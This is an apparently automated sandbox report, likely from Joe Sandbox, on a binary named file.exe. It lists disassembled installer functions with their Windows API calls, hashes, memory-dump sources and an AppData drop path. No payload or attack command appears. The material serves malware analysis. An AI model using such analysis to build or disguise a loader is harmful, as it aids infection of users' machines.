                                                              Similarity
                                                              • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                              • String ID:
                                                              • API String ID: 2972824698-0
                                                              • Opcode ID: 3e0ab9320d322eb7e83734c8f16b68858ef74ab2c998c223a53f08904ab87bbd
                                                              • Instruction ID: 72ab4701d282d41bfb99937ccb951c9b3d992b5a19319da95f503844dddfcbd3
                                                              • Opcode Fuzzy Hash: 3e0ab9320d322eb7e83734c8f16b68858ef74ab2c998c223a53f08904ab87bbd
                                                              • Instruction Fuzzy Hash: EEF0F032804015ABCB20BBA199849DE72B5CF00318B21413FE102B21D1C77C0E42AA6E

                                                              Non-executed Functions

                                                              Function 004049C7 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404A16
                                                              • SetWindowTextW.USER32(00000000,?), ref: 00404A40
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 00404AF1
                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404AFC
                                                              • lstrcmpiW.KERNEL32(Exec,0042CA68,00000000,?,?), ref: 00404B2E
                                                              • lstrcatW.KERNEL32(?,Exec), ref: 00404B3A
                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404B4C
                                                                • Part of subcall function 00405B9B: GetDlgItemTextW.USER32(?,?,00000400,00404B83), ref: 00405BAE
                                                                • Part of subcall function 00406805: CharNextW.USER32(?,*?|<>/":,00000000,0043F000,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 00406868
                                                                • Part of subcall function 00406805: CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406877
                                                                • Part of subcall function 00406805: CharNextW.USER32(?,0043F000,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040687C
                                                                • Part of subcall function 00406805: CharPrevW.USER32(?,?,75573420,C:\Users\user\AppData\Local\Temp\,00000000,0040350D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040381C,?,00000008,0000000A,0000000C), ref: 0040688F
                                                              • GetDiskFreeSpaceW.KERNEL32(0042AA38,?,?,0000040F,?,0042AA38,0042AA38,?,00000001,0042AA38,?,?,000003FB,?), ref: 00404C0F
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404C2A
                                                                • Part of subcall function 00404D83: lstrlenW.KERNEL32(0042CA68,0042CA68,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404E24
                                                                • Part of subcall function 00404D83: wsprintfW.USER32 ref: 00404E2D
                                                                • Part of subcall function 00404D83: SetDlgItemTextW.USER32(?,0042CA68), ref: 00404E40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: A$Exec
                                                              • API String ID: 2624150263-2074005321
                                                              • Opcode ID: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                              • Instruction ID: 8a45afd3ee22384d80319c7ed67abe130e578f1d2b392c1e8909742cb30e522b
                                                              • Opcode Fuzzy Hash: aab1ff152b07609d5ccd452d97b16b322b3ddb3b1e57e49f69f3ed37cd316d4d
                                                              • Instruction Fuzzy Hash: FCA192B1900208ABDB11EFA5DD45BAFB7B8EF84314F11803BF611B62D1D77C9A418B69
                                                              Function 004021AF Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CoCreateInstance.OLE32(004085E8,?,00000001,004085D8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040222E
                                                              Strings
                                                              • C:\Users\user\AppData\Local\acneform\Tjenestepligterne, xrefs: 0040226E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateInstance
                                                              • String ID: C:\Users\user\AppData\Local\acneform\Tjenestepligterne
                                                              • API String ID: 542301482-3042626848
                                                              • Opcode ID: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
                                                              • Instruction ID: f0c409d0c9855dc16f3492d495f607d4fcaf843261c47ee8c1995525671fe781
                                                              • Opcode Fuzzy Hash: 7326b08ec6d512b6b783f70a6e13437ea8f5b6047ef19b1df3461ee5cf714417
                                                              • Instruction Fuzzy Hash: 76411471A00208AFCB40DFE4C989EAD7BB5FF48308B20457AF515EB2D1DB799982CB54
                                                              Function 00406DC6 Relevance: .3, Instructions: 334COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                              • Instruction ID: a5eb8001d75a17d38d83411349fde439c8a9064fda1b18d7f978e280ae41e255
                                                              • Opcode Fuzzy Hash: ca9fc840679c4677ea5dd763a2b97f011fd48deb17cd4c9d43ec117c62889360
                                                              • Instruction Fuzzy Hash: ACE19C71A04709DFCB24CF58C880BAABBF1FF45305F15852EE496A72D1E378AA51CB05
                                                              Function 0040759D Relevance: .3, Instructions: 300COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                              • Instruction ID: e409ec8ffb443055957628c835c79614664982182129ebc37b3e11cb9bcd83e5
                                                              • Opcode Fuzzy Hash: 5db23d3e625216a1972a1fea7a98b9ee98c1df0b240da8e2d6c4f39054d3f9c6
                                                              • Instruction Fuzzy Hash: ECC14772E04219CBCF18CF68C4905EEBBB2BF98354F25866AD85677380D7346942CF95
                                                              Function 00404F43 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404F5B
                                                              • GetDlgItem.USER32(?,00000408), ref: 00404F66
                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404FB0
                                                              • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404FC7
                                                              • SetWindowLongW.USER32(?,000000FC,00405550), ref: 00404FE0
                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FF4
                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00405006
                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 0040501C
                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405028
                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040503A
                                                              • DeleteObject.GDI32(00000000), ref: 0040503D
                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405068
                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405074
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040510F
                                                              • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040513F
                                                                • Part of subcall function 0040450B: SendMessageW.USER32(00000028,?,00000001,00404336), ref: 00404519
                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405153
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00405181
                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040518F
                                                              • ShowWindow.USER32(?,00000005), ref: 0040519F
                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040529A
                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052FF
                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405314
                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405338
                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405358
                                                              • ImageList_Destroy.COMCTL32(?), ref: 0040536D
                                                              • GlobalFree.KERNEL32(?), ref: 0040537D
                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053F6
                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040549F
                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004054AE
                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 004054D9
                                                              • ShowWindow.USER32(?,00000000), ref: 00405527
                                                              • GetDlgItem.USER32(?,000003FE), ref: 00405532
                                                              • ShowWindow.USER32(00000000), ref: 00405539
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                              • String ID: $M$N
                                                              • API String ID: 2564846305-813528018
                                                              • Opcode ID: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                              • Instruction ID: 91097811874ce85ba3cc7540bcf7dd58db25a3d6f071223140e4d1ec27d7ea12
                                                              • Opcode Fuzzy Hash: 14683326fe5d0e21a3b01d942e888f99a0d9647cceadcd168bf81575faddcc86
                                                              • Instruction Fuzzy Hash: 6C029C70900608AFDF20DF94DD85AAF7BB5FB85314F10817AE611BA2E1D7798A41CF58
                                                              Function 00404695 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404733
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404747
                                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404764
                                                              • GetSysColor.USER32(?), ref: 00404775
                                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404783
                                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404791
                                                              • lstrlenW.KERNEL32(?), ref: 00404796
                                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004047A3
                                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047B8
                                                              • GetDlgItem.USER32(?,0000040A), ref: 00404811
                                                              • SendMessageW.USER32(00000000), ref: 00404818
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00404843
                                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404886
                                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00404894
                                                              • SetCursor.USER32(00000000), ref: 00404897
                                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004048B0
                                                              • SetCursor.USER32(00000000), ref: 004048B3
                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048E2
                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048F4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                              • String ID: Exec$N
                                                              • API String ID: 3103080414-17853963
                                                              • Opcode ID: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                              • Instruction ID: 3ad42440e7936429012ccc374b67200ab01768f99e4ad58672f49272ac14a637
                                                              • Opcode Fuzzy Hash: 04e13e5971a3aaf2d7c3f6bec99ed017c89c89abbf6057be99a5caf0d4384f9a
                                                              • Instruction Fuzzy Hash: 2E6181B1900209BFDB10AF60DD85EAA7B69FB84315F00853AFA05B62D0C779A951DF98
                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                              • DrawTextW.USER32(00000000,00433700,000000FF,00000010,00000820), ref: 00401156
                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                              • String ID: F
                                                              • API String ID: 941294808-1304234792
                                                              • Opcode ID: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                              • Instruction ID: eca0ad76d85821e0a7fbe67f508e5060b260b918cc65b70bf06bca200ae74670
                                                              • Opcode Fuzzy Hash: f8b3db801d2c504d9e2de6f85bac4b8fdc05036872983a9c428bf394377a2a15
                                                              • Instruction Fuzzy Hash: 2F418B71800209AFCB058FA5DE459AFBFB9FF45314F00802EF591AA1A0C738EA54DFA4
                                                              Function 0040619D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406338,?,?), ref: 004061D8
                                                              • GetShortPathNameW.KERNEL32(?,00430108,00000400), ref: 004061E1
                                                                • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                • Part of subcall function 00405FAC: lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                              • GetShortPathNameW.KERNEL32(?,00430908,00000400), ref: 004061FE
                                                              • wsprintfA.USER32 ref: 0040621C
                                                              • GetFileSize.KERNEL32(00000000,00000000,00430908,C0000000,00000004,00430908,?,?,?,?,?), ref: 00406257
                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406266
                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040629E
                                                              • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,0042FD08,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062F4
                                                              • GlobalFree.KERNEL32(00000000), ref: 00406305
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040630C
                                                                • Part of subcall function 00406047: GetFileAttributesW.KERNELBASE(00000003,004030C2,C:\Users\user\Desktop\file.exe,80000000,00000003), ref: 0040604B
                                                                • Part of subcall function 00406047: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040606D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449300540.0000000000465000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                              • String ID: %ls=%ls$[Rename]
                                                              • API String ID: 2171350718-461813615
                                                              • Opcode ID: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                              • Instruction ID: 2f157a22eecee44515c187ff3daf75b9e7e255f904fde787f0dd9ddf92a1116e
                                                              • Opcode Fuzzy Hash: 7d01897451b1442b79f1fbad31b5db9882c2a06ae1a72dd2fb598b53c99231a5
                                                              • Instruction Fuzzy Hash: C9312271200315BBD2206B619D49F2B3A5CEF85718F16043EFD42FA2C2DB7D99258ABD
                                                              Function 6FF61B67 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 83processstringsynchronizationCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCommandLineW.KERNEL32(00000400), ref: 6FF61B96
                                                              • lstrcpynW.KERNEL32(?,00000000), ref: 6FF61BA4
                                                              • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000044,?), ref: 6FF61C03
                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6FF61C15
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 6FF61C22
                                                              • CloseHandle.KERNEL32(?), ref: 6FF61C31
                                                              • CloseHandle.KERNEL32(?), ref: 6FF61C36
                                                              • ExitProcess.KERNEL32 ref: 6FF61C3B
                                                              • ExitProcess.KERNEL32 ref: 6FF61C46
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1450170496.000000006FF61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FF60000, based on PE: true
                                                              • Associated: 00000000.00000002.1450157086.000000006FF60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450186265.000000006FF62000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450199247.000000006FF63000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000000.00000002.1450217071.000000006FF64000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_6ff60000_file.jbxd
                                                              Similarity
                                                              • API ID: Process$Exit$CloseHandle$CodeCommandCreateLineObjectSingleWaitlstrcpyn
                                                              • String ID: "$D
                                                              • API String ID: 2956148522-1154559923
                                                              • Opcode ID: 9695ffb5c56c7fb99b022c76cd0c0abe2a4cd91498a99b60668136a692ceaf9c
                                                              • Instruction ID: ac0fef9d0a6b345b2996308ff8cc2fcef5da86809693837e4a4c38b1495dcef8
                                                              • Opcode Fuzzy Hash: 9695ffb5c56c7fb99b022c76cd0c0abe2a4cd91498a99b60668136a692ceaf9c
                                                              • Instruction Fuzzy Hash: D321AE32810519FADF249BE0CD08AEFBB78EF05761F500016E216B61A0EF701A58CBA1
                                                              Function 0040453D Relevance: 12.1, APIs: 8, Instructions: 68COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetWindowLongW.USER32(?,000000EB), ref: 0040455A
                                                              • GetSysColor.USER32(00000000), ref: 00404598
                                                              • SetTextColor.GDI32(?,00000000), ref: 004045A4
                                                              • SetBkMode.GDI32(?,?), ref: 004045B0
                                                              • GetSysColor.USER32(?), ref: 004045C3
                                                              • SetBkColor.GDI32(?,?), ref: 004045D3
                                                              • DeleteObject.GDI32(?), ref: 004045ED
                                                              • CreateBrushIndirect.GDI32(?), ref: 004045F7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1449058394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.1449034776.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449077527.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1449128028.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
